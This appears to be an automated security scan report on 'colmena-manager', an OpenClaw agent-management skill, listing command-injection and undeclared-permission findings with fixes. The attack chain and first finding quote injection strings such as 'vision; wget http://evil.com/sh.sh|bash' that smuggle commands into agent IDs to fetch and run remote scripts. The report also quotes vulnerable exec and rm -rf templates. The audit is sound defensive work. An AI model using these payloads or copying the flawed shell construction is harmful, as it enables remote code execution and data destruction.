Suspicious — Risk Score 50/100
Last scan: 22 hr ago
colmena-manager
Skill for managing and coordinating OpenClaw agents as a hive
Skill presents as a legitimate OpenClaw agent manager but contains multiple command-injection vulnerabilities from unsanitized user-controlled input piped into shell commands, with shell execution entirely undeclared in documentation.
Skill Name: colmena-manager
Duration: 73.8s
Engine: pi
Use with caution
Do not deploy. Replace all exec() calls with parameterized APIs. Remove direct shell command construction. Add proper allowed-tools declarations. Audit agent.id and name inputs for shell metacharacters before use in any command context.

Attack Chain (4 steps)

1. Escalation: Attacker registers a malicious agent with shell metacharacters in the ID (e.g., 'vision; wget http://evil.com/sh.sh|bash') [src/index.js:12]
2. Entry: Victim runs 'colmena-manager health-check' to monitor the hive [src/index.js:120]
3. Escalation: healthCheck() calls exec() with ps aux | grep ${agent.id}, where agent.id contains unsanitized shell metacharacters from step 1 [src/index.js:131]
4. Impact: Shell injection executes arbitrary commands (download + execute remote script) with the permissions of the running user [src/index.js:131]

Findings (6 items)

High: Command injection via agentId in multiple exec() calls (RCE)
The agentId parameter (sourced from the agents_list API response) is directly interpolated into shell commands via template literals in three separate locations: logs() at line 66, healthCheck() at line 131, and checkMemory() at line 162. An attacker who registers a malicious agent with shell metacharacters in the ID (e.g., 'main; curl http://attacker.com') can achieve arbitrary command execution on the host when any of these commands are invoked.
Evidence: command: `tail -n ${lines} /home/nvi/.openclaw/sessions/${agentId}/logs.txt`
→ Validate agentId against a strict alphanumeric/whitelist pattern before using it in any shell command. Use OpenClaw's native session API instead of shell tail for log retrieval.
Location: src/index.js:66
High: Command injection via workspace name in rm -rf (RCE)
The workspace name argument passed to workspaceRemove() is directly interpolated into an rm -rf shell command without sanitization. While the base path /home/nvi/.openclaw/workspace- provides some containment, path traversal sequences like '../../../' could escape the intended directory and delete arbitrary files on the system as the executing user.
Evidence: command: `rm -rf /home/nvi/.openclaw/workspace-${name}`
→ Validate the workspace name against a strict pattern (e.g., /^[a-z0-9-]+$/). Use Node.js fs.rmSync() with a verified absolute path instead of shell rm. Add a confirmation prompt before destructive operations.
Location: src/index.js:193
High: Shell execution completely absent from SKILL.md (Doc Mismatch)
SKILL.md's API section lists only OpenClaw native functions (agents_list, sessions_list, sessions_send, message, exec/process). It never discloses that exec() is used to run arbitrary shell commands (tail, ps, grep, awk, ls, mkdir, rm). Users deploying this skill have no indication that it requires shell:WRITE permissions or executes system commands.
Evidence: - `exec` / `process`: For health checks and system diagnostics
→ SKILL.md must explicitly declare the shell:WRITE permission and list each shell command used. Users must give informed consent before a skill can execute system commands.
Location: SKILL.md:55
Medium: Referenced HEARTBEAT.md does not exist (Doc Mismatch)
SKILL.md advertises an automatic heartbeat script (HEARTBEAT.md) that runs every 30 minutes for health monitoring. This file is referenced in both SKILL.md and README.md but does not exist in the project. This is either an incomplete feature or documentation that overstates capabilities.
Evidence: The skill includes a HEARTBEAT.md file that runs automatically every 30 minutes
→ Either implement HEARTBEAT.md or remove all references to it from the documentation. If implemented, declare its resource requirements explicitly.
Location: SKILL.md:64
Medium: No allowed-tools declaration despite full shell/filesystem access (Priv Escalation)
claws.json and SKILL.md do not declare any allowed-tools. The skill uses exec() for shell:WRITE operations (tail, ps, grep, awk, ls, mkdir, rm) and filesystem:WRITE operations (mkdir, rm -rf) across multiple methods. These permissions are entirely absent from any manifest, preventing the host AI from properly scoping the skill's capabilities.
Evidence: No 'allowedTools' or 'permissions' field present
→ Add an allowed-tools declaration to claws.json: {"tools": [{"name": "Bash", "resource": "shell", "level": "WRITE"}, {"name": "Write", "resource": "filesystem", "level": "WRITE"}]}
Location: claws.json:1
Low: Hardcoded /home/nvi/ path creates dependency on a specific user account (Sensitive Access)
All file operations (logs, workspaces) hardcode /home/nvi/ as the base path. This is not declared as a prerequisite, and the path does not appear in the SKILL.md requirements. The skill will silently fail on systems where this user does not exist.
Evidence: /home/nvi/.openclaw/sessions/${agentId}/logs.txt
→ Derive the OpenClaw data directory from an environment variable (e.g., OPENCLAW_HOME or XDG_DATA_HOME) or make it a configurable parameter.
Location: src/index.js:66
Permissions (Resource / Declared / Inferred / Status / Evidence)

Shell: Declared NONE, Inferred WRITE, Status ✗ Violation
  Evidence: src/index.js:66 exec with tail | src/index.js:131 exec with ps|grep | src/index.…
Filesystem: Declared NONE, Inferred WRITE, Status ✗ Violation
  Evidence: src/index.js:188 mkdir via exec | src/index.js:193 rm -rf via exec
Skill Invoke: Declared NONE, Inferred READ, Status ✓ Aligned
  Evidence: src/index.js:13 agents_list, sessions_list, sessions_send — matches SKILL.md API…
Pattern matches: 3 findings (1 Critical)

Critical: Dangerous Shell Command
  rm -rf /
  src/index.js:193
Medium: External URL
  https://clawhub.com/colmena-manager
  claws.json:15
Info: Email Address
  [email protected]
  claws.json:18

File Tree

5 files · 14.1 KB · 552 lines
JavaScript: 1 file, 289 lines · Markdown: 2 files, 211 lines · JSON: 2 files, 52 lines
├─ 📁 src
│ └─ 📜 index.js JavaScript 289L · 7.9 KB
├─ 📋 claws.json JSON 31L · 671 B
├─ 📋 package.json JSON 21L · 470 B
├─ 📝 README.md Markdown 36L · 1.1 KB
└─ 📝 SKILL.md Markdown 175L · 4.0 KB

Dependencies (1 item)

Package | Version | Source | Known Vulns | Notes
openclaw | >=1.0.0 | npm (peer dep) | No | Peer dependency, not bundled. No known vulnerabilities.

Security Positives

✓ Skill implements its stated functionality (agent management) without additional hidden data exfiltration
✓ No base64-encoded payloads or obfuscated code blocks found
✓ No credential harvesting from ~/.ssh, ~/.aws, or .env files
✓ No network requests to external IPs detected
✓ No reverse shell, C2, or data theft mechanisms present
✓ No cron/scheduled task persistence mechanisms found
✓ No malicious dependencies detected; package.json has minimal legitimate dependencies